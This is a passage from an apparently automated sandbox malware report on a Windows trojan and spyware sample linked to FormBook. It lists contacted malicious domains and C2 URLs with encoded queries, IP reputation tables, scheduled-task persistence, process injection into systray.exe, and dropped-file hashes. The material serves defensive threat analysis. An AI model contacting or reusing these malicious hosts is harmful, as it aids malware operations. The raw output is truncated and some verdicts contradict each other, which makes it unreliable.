                http://www.hayaniya.org/yf1h/ | 0% | Avira URL Cloud | safe |
                http://www.lovel.shop/rxts/?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825 | 0% | Avira URL Cloud | safe |
                http://www.losmason.shop/s15n/?nHI4y=ULkH023p-2&MHJ0GXi=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHyT0LsuYRSsPCWoh575Uq8xJMJajdjvw7bNvPz2QoSF69NC7qAb+tKFkF | 0% | Avira URL Cloud | safe |
                http://www.hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2 | 0% | Avira URL Cloud | safe |
                http://hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM | 0% | Avira URL Cloud | safe |
                http://www.lovel.shop/rxts/ | 0% | Avira URL Cloud | safe |
                http://www.holytur.net/cs9k/?MHJ0GXi=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gqPapChlQiVLnuWWyjSHSngUOewn7sS2CIDtXVuGZPpJOLluzJeAwPaf/&nHI4y=ULkH023p-2 | 0% | Avira URL Cloud | safe |
                http://www.losmason.shop/s15n/ | 0% | Avira URL Cloud | safe |
                http://www.duskgazes.work/zs4o/?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2 | 0% | Avira URL Cloud | safe |
                http://www.nieuws-july202488.sbs/30le/ | 0% | Avira URL Cloud | safe |
                http://www.duskgazes.work | 0% | Avira URL Cloud | safe |
                http://www.duskgazes.work/zs4o/ | 0% | Avira URL Cloud | safe |
                http://www.nieuws-july202488.sbs/30le/?MHJ0GXi=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+BH+AK0OJhf+I7eM6xe7113ZbRKEe7/cQK41GtHqpeCJq4WZTqkgr8MY5&nHI4y=ULkH023p-2 | 0% | Avira URL Cloud | safe |
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                nieuws-july202488.sbs | 162.0.215.33 | true | true | | unknown
                hayaniya.org | 192.185.147.100 | true | true | | unknown
                holytur.net | 185.106.208.3 | true | false | | unknown
                www.losmason.shop | 104.18.73.116 | true | true | | unknown
                www.zrinorem-srumimit.sbs | 188.114.96.3 | true | true | | unknown
                www.lovel.shop | 13.248.169.48 | true | true | | unknown
                duskgazes.work | 15.197.148.33 | true | true | | unknown
                www.nieuws-july202488.sbs | unknown | unknown | false | | unknown
                www.duskgazes.work | unknown | unknown | false | | unknown
                www.holytur.net | unknown | unknown | false | | unknown
                www.hayaniya.org | unknown | unknown | false | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                http://www.hayaniya.org/yf1h/ | true | Avira URL Cloud: safe | unknown
                http://www.losmason.shop/s15n/?nHI4y=ULkH023p-2&MHJ0GXi=JfQJqlQL4YuujxfZFicS9Y3zSvzh5uc29LPY+3nQdNuELRDWQb2uefNArAI9Jzm+wUv6iBr2b0gwhreB6wQHyT0LsuYRSsPCWoh575Uq8xJMJajdjvw7bNvPz2QoSF69NC7qAb+tKFkF | true | Avira URL Cloud: safe | unknown
                http://www.hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM+Bxvkr6dioDBNQhLHAnFkN0G7WaNsS3kDmK0ayEpl6TGabHlNeLLSejHELaV5PyBe2QzNbQvUHYc/0M0Tzmov1eC9unFVYK6Dr3q02N&nHI4y=ULkH023p-2 | true | Avira URL Cloud: safe | unknown
                http://www.holytur.net/cs9k/?MHJ0GXi=W7SiLeR8lVOS0IddzXWoYXDt6RHub9Z/llH5xMN7IPTa857c9EQRUjsfmtg32BbwdcsWIPqYG66ejHdS265gqPapChlQiVLnuWWyjSHSngUOewn7sS2CIDtXVuGZPpJOLluzJeAwPaf/&nHI4y=ULkH023p-2 | false | Avira URL Cloud: safe | unknown
                http://www.nieuws-july202488.sbs/30le/ | true | Avira URL Cloud: safe | unknown
                http://www.duskgazes.work/zs4o/?MHJ0GXi=40yvXZqQXwyOFTl0d1fxwhQGTsZjKCC3JWjHJEZ8IBZutO+YSqvvwioh1RBVRKlMIRVxucUqEMWgr+FAgfZYrRUrNMNQgIXAOg6Dx5ZtNmZ3l7Xsr8IlhehM93LMclm51whCbAvUXWV5&nHI4y=ULkH023p-2 | true | Avira URL Cloud: safe | unknown
                http://www.lovel.shop/rxts/?nHI4y=ULkH023p-2&MHJ0GXi=UMqd3Rr/GgjcpDtMifF0hAVXULwugGyaJHdfF0vXYxuoY8NmwcRKHFRQ3Zc522gmFWLmVhpOr5FlbfkrODlmI/FI9mNBtfUcHsH1BXvHeC8ccNMTzjG08xLSDUiWAIgxE0vpFMVGa825 | true | Avira URL Cloud: safe | unknown
                http://www.losmason.shop/s15n/ | true | Avira URL Cloud: safe | unknown
                http://www.lovel.shop/rxts/ | true | Avira URL Cloud: safe | unknown
                http://www.nieuws-july202488.sbs/30le/?MHJ0GXi=jHE7b6Z9ED1A0Je7bwo+kjGjstTykwGZjMkqHVfcjQ95lgOzDj3OOkgun9YTkzFADI0DOvoxgj3LN5jGlHy+BH+AK0OJhf+I7eM6xe7113ZbRKEe7/cQK41GtHqpeCJq4WZTqkgr8MY5&nHI4y=ULkH023p-2 | true | Avira URL Cloud: safe | unknown
                http://www.duskgazes.work/zs4o/ | true | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                https://ac.ecosia.org/autocomplete?q= | systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/chrome_newtab | systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/ac/?q= | systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer | systray.exe, 00000017.00000002.2512922275.0000000005DA6000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.0000000002E16000.00000004.00000001.00040000.00000000.sdmp | false | | high
                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://hayaniya.org/yf1h/?MHJ0GXi=YVpI46H16R/w/kk1bY6rBRavyZUbsgJtp9CZM | systray.exe, 00000017.00000002.2512922275.00000000060CA000.00000004.10000000.00040000.00000000.sdmp, ISaSZznjXcpoJ.exe, 00000018.00000002.2511948810.000000000313A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://www.duskgazes.work | ISaSZznjXcpoJ.exe, 00000018.00000002.2513591894.0000000004D2C000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://www.ecosia.org/newtab/ | systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | n2pGr8w21V.exe, 00000000.00000002.1373842326.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, uEugNEto.exe, 00000011.00000002.1522692999.00000000030C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | n2pGr8w21V.exe, uEugNEto.exe.0.dr | false | | high
                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | systray.exe, 00000017.00000002.2514817547.00000000083DB000.00000004.00000020.00020000.00000000.sdmp | false | | high
                IP | Domain | Country | ASN | ASN Name | Malicious
                162.0.215.33 | nieuws-july202488.sbs | Canada | 35893 | ACPCA | true
                104.18.73.116 | www.losmason.shop | United States | 13335 | CLOUDFLARENETUS | true
                15.197.148.33 | duskgazes.work | United States | 7430 | TANDEMUS | true
                13.248.169.48 | www.lovel.shop | United States | 16509 | AMAZON-02US | true
                192.185.147.100 | hayaniya.org | United States | 26337 | OIS1US | true
                185.106.208.3 | holytur.net | Turkey | 42846 | GUZELHOSTINGGNETINTERNETTELEKOMUNIKASYONASTR | false
                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1588691
                                                            Start date and time:2025-01-11 04:15:04 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 8m 52s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:28
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:n2pGr8w21V.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:5d24a5cb60554c37dd1850f057e8ea8ea021cae00cb7febed5ca6d9768f27502.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@23/16@7/6
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HCA Information:
                                                            • Successful, ratio: 98%
                                                            • Number of executed functions: 90
                                                            • Number of non-executed functions: 288
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 2.23.242.162, 13.107.246.45, 52.149.20.212
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: n2pGr8w21V.exe
Time | Type | Description
04:16:09 | Task Scheduler | Run new task: uEugNEto path: C:\Users\user\AppData\Roaming\uEugNEto.exe
22:16:00 | API Interceptor | 1x Sleep call for process: n2pGr8w21V.exe modified
22:16:07 | API Interceptor | 49x Sleep call for process: powershell.exe modified
22:16:12 | API Interceptor | 1x Sleep call for process: uEugNEto.exe modified
23:59:14 | API Interceptor | 1758467x Sleep call for process: systray.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name (context listed below each row)
162.0.215.33 | MN1qo2qaJmEvXDP.exe | malicious | FormBook
• www.nieuws-july202488.sbs/30le/
162.0.215.33 | Documents.exe | malicious | FormBook, PureLog Stealer
• www.nieuws-july202488.sbs/30le/
162.0.215.33 | dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | malicious | FormBook
• www.nieuws-july202541.sbs/0bvv/
162.0.215.33 | QUOTE2342534.exe | malicious | FormBook
• www.nieuws-july202491.sbs/4bpc/
162.0.215.33 | r0000000NT_PDF.exe | malicious | FormBook
• www.nieuws-july202491.sbs/rq5n/
162.0.215.33 | rInvoiceCM60916_xlx.exe | malicious | FormBook
• www.nieuws-july202491.sbs/rq5n/
162.0.215.33 | z1SupplyInvoiceCM60916_Doc.exe | malicious | FormBook
• www.nieuws-july202491.sbs/rq5n/
104.18.73.116 | MN1qo2qaJmEvXDP.exe | malicious | FormBook
• www.losmason.shop/s15n/
104.18.73.116 | Documents.exe | malicious | FormBook, PureLog Stealer
• www.losmason.shop/s15n/
104.18.73.116 | santi.exe | malicious | FormBook
• www.losmason.shop/uktz/
104.18.73.116 | http://www.toolfriendonline.com | malicious | Unknown
• www.toolfriendonline.com/
104.18.73.116 | http://nigoovip.com | malicious | Unknown
• nigoovip.com/
15.197.148.33 | PO 1202495088.exe | malicious | FormBook
• www.outandaboutatlanta.net/kr0d/
15.197.148.33 | RN# D7521-RN-00353 REV-2.exe | malicious | FormBook
• www.micrhyms.info/uao9/
15.197.148.33 | 0CkEHZjZgO.vbs | malicious | FormBook
• www.myjiorooms.services/fksk/
15.197.148.33 | RFQ.docx | malicious | FormBook
• www.maryneedskidneys.info/tqdg/
15.197.148.33 | SHIPPING DOC_20241107.exe | malicious | FormBook
• www.energyparks.net/k47i/
15.197.148.33 | p4rsJEIb7k.exe | malicious | FormBook
• www.hyman.life/7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8
15.197.148.33 | Viridine84.exe | malicious | FormBook, GuLoader
• www.ninesquare.games/42mc/
15.197.148.33 | IND24072113.xlsx | malicious | Unknown
• www.jilifish.win/to3j/
15.197.148.33 | ekte.exe | malicious | FormBook
• www.childlesscatlady.today/0l08/
15.197.148.33 | IND24072113_1.xlsx | malicious | Unknown
• www.jilifish.win/to3j/
Match | Associated Sample Name / URL | Detection | Threat Name (context listed below each row)
www.losmason.shop | MN1qo2qaJmEvXDP.exe | malicious | FormBook
• 104.18.73.116
www.losmason.shop | Documents.exe | malicious | FormBook, PureLog Stealer
• 104.18.73.116
www.losmason.shop | santi.exe | malicious | FormBook
• 104.18.73.116
www.zrinorem-srumimit.sbs | MN1qo2qaJmEvXDP.exe | malicious | FormBook
• 104.21.38.113
www.zrinorem-srumimit.sbs | Documents.exe | malicious | FormBook, PureLog Stealer
• 172.67.222.69
www.lovel.shop | MN1qo2qaJmEvXDP.exe | malicious | FormBook
• 13.248.169.48
www.lovel.shop | Documents.exe | malicious | FormBook, PureLog Stealer
• 13.248.169.48
Match | Associated Sample Name / URL | Detection | Threat Name (context listed below each row)
CLOUDFLARENETUS | tNXl4XhgmV.exe | malicious | MassLogger RAT
• 104.21.48.1
CLOUDFLARENETUS | MyzWeEOlqb.exe | malicious | AgentTesla
• 104.26.12.205
CLOUDFLARENETUS | 02Eh1ah35H.exe | malicious | FormBook, GuLoader
• 172.67.167.146
CLOUDFLARENETUS | 5hD3Yjf7xD.exe | malicious | AgentTesla
• 172.67.74.152
CLOUDFLARENETUS | MBOaS3GRtF.exe | malicious | Snake Keylogger
• 104.21.64.1
CLOUDFLARENETUS | https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNX | malicious | Unknown
• 104.17.205.31
                                                            https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350
x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330Get hashmaliciousUnknownBrowse
• 172.64.41.3
CLOUDFLARENETUS | fpIGwanLZi.exe | malicious | Snake Keylogger
• 104.21.48.1
CLOUDFLARENETUS | fpIGwanLZi.exe | malicious | Snake Keylogger
• 104.21.48.1
CLOUDFLARENETUS | AJ5zYYsisA.exe | malicious | Unknown
• 188.114.97.3
ACPCA | 5by4QM3v89.exe | malicious | FormBook
• 162.0.215.91
ACPCA | gKvjKMCUfq.exe | malicious | FormBook
• 162.0.213.94
ACPCA | http://url4619.blast.fresha.com/ls/click?upn=u001.G0bnNiVD8tDhPRdNyxjhDe6AC2ZUylxwA-2FPGy7qPBOFCUALhhiYANslkdkKDsOuTa2ZqT7n3N6bFcUrsV3ma3w-3D-3DiLPp_ykKDCurTiMzdScmvRsWtgHw-2Bx-2FsD8gtjZ2QYvaL9rQITVCU8DqQaupyP3UmfqTkykrcOULUqJB8vo6EwGC-2FXTrZZmpb9VysDXh-2Bs9eImE1UjAPhR388ASwoK2AP8BEYSRfU-2BeoIKBzUjhDstghksAsPKSpvEGafa0WwVUEqkryumMEQR7LzeuVihS6omMjDxWLWVMpRaOOynXHENqj69QJe59g4iFPytRm60mTk5xjXMgeEaRzFxoPJ4ml3mi0VzHAqUdjS3jfMBnOzPxHyb77YZzptZnuj5FOqVfelcRKxyeSqvYRwMU4ICLhbfcggUpY9RSJQ7f8uHQHGk5X2Upw-3D-3D | malicious | Unknown
• 162.0.217.138
ACPCA | bkTW1FbgHN.exe | malicious | FormBook
• 162.0.213.94
ACPCA | armv4l.elf | malicious | Unknown
• 162.48.74.191
ACPCA | Fantazy.i486.elf | malicious | Unknown
• 162.9.114.234
ACPCA | Fantazy.spc.elf | malicious | Unknown
• 162.33.209.59
ACPCA | 5.elf | malicious | Unknown
• 162.56.1.17
ACPCA | miori.arm5.elf | malicious | Unknown
• 162.1.10.7
ACPCA | arm5.elf | malicious | Mirai
• 162.32.170.30
AMAZON-02US | PGK60fNNCZ.exe | malicious | FormBook
• 13.248.169.48
AMAZON-02US | 02Eh1ah35H.exe | malicious | FormBook, GuLoader
• 76.223.54.146
AMAZON-02US | zAg7xx1vKI.exe | malicious | FormBook
• 13.248.169.48
AMAZON-02US | 1SxKeB4u0c.exe | malicious | FormBook
• 18.141.10.107
AMAZON-02US | SpCuEoekPa.exe | malicious | FormBook
• 13.228.81.39
AMAZON-02US | suBpo1g13Q.exe | malicious | FormBook
• 13.248.169.48
AMAZON-02US | 5.elf | malicious | Unknown
• 157.175.218.227
AMAZON-02US | BzK8rQh2O3.exe | malicious | FormBook
• 18.141.10.107
AMAZON-02US | k9OEsV37GE.exe | malicious | FormBook
• 18.163.74.139
AMAZON-02US | e47m9W6JGQ.exe | malicious | FormBook
• 13.248.169.48
TANDEMUS | http://www.lpb.gov.lr | malicious | CAPTCHA Scam ClickFix
• 15.197.152.159
TANDEMUS | https://red.travelglobeimmigration.com | malicious | Unknown
• 15.197.240.20
TANDEMUS | https://we.tl/t-fnebgmrnYQ | malicious | Unknown
• 15.197.193.217
TANDEMUS | http://www.singhs.lv | malicious | CAPTCHA Scam ClickFix
• 15.197.152.159
TANDEMUS | http://www.www.cascotiaonlinemobile.com/ | malicious | Unknown
• 15.197.130.221
TANDEMUS | mail (4).eml | malicious | Unknown
• 15.197.193.217
TANDEMUS | https://rebrand.ly/3d446f | malicious | HTMLPhisher
• 15.197.137.111
TANDEMUS | http://click.pstmrk.it | malicious | Unknown
• 15.197.236.169
TANDEMUS | rHP_SCAN_DOCUME.exe | malicious | FormBook
• 15.197.240.20
TANDEMUS | https://www.boulderpeptide.org/ | malicious | CAPTCHA Scam ClickFix
• 15.197.152.159
                                                            No context
                                                            No context
                                                            Process:C:\Users\user\Desktop\n2pGr8w21V.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Users\user\AppData\Roaming\uEugNEto.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.379633281639906
                                                            Encrypted:false
                                                            SSDEEP:48:BWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:BLHxvCsIfA2KRHmOugw1s
                                                            MD5:707D84D53930CEF35303F95757D41DFD
                                                            SHA1:493518B676BEF7A575CC7F9AD46B2AA874FE0128
                                                            SHA-256:C7D5489CB7AEFE8BD66DBE86814498EBF4721C28B6E01AE93D2633E9FF127C65
                                                            SHA-512:B9DB31F55B1017E2B266124D1FB33A087642F0579952A9761B84EC6644A094BA150D78B2CE15A1821655283E308AF0FEB9CCEBCCA145F38F4926D075A7531F0D
                                                            Malicious:false
                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\systray.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:modified
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1215420383712111
                                                            Encrypted:false
                                                            SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                            MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                            SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                            SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                            SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
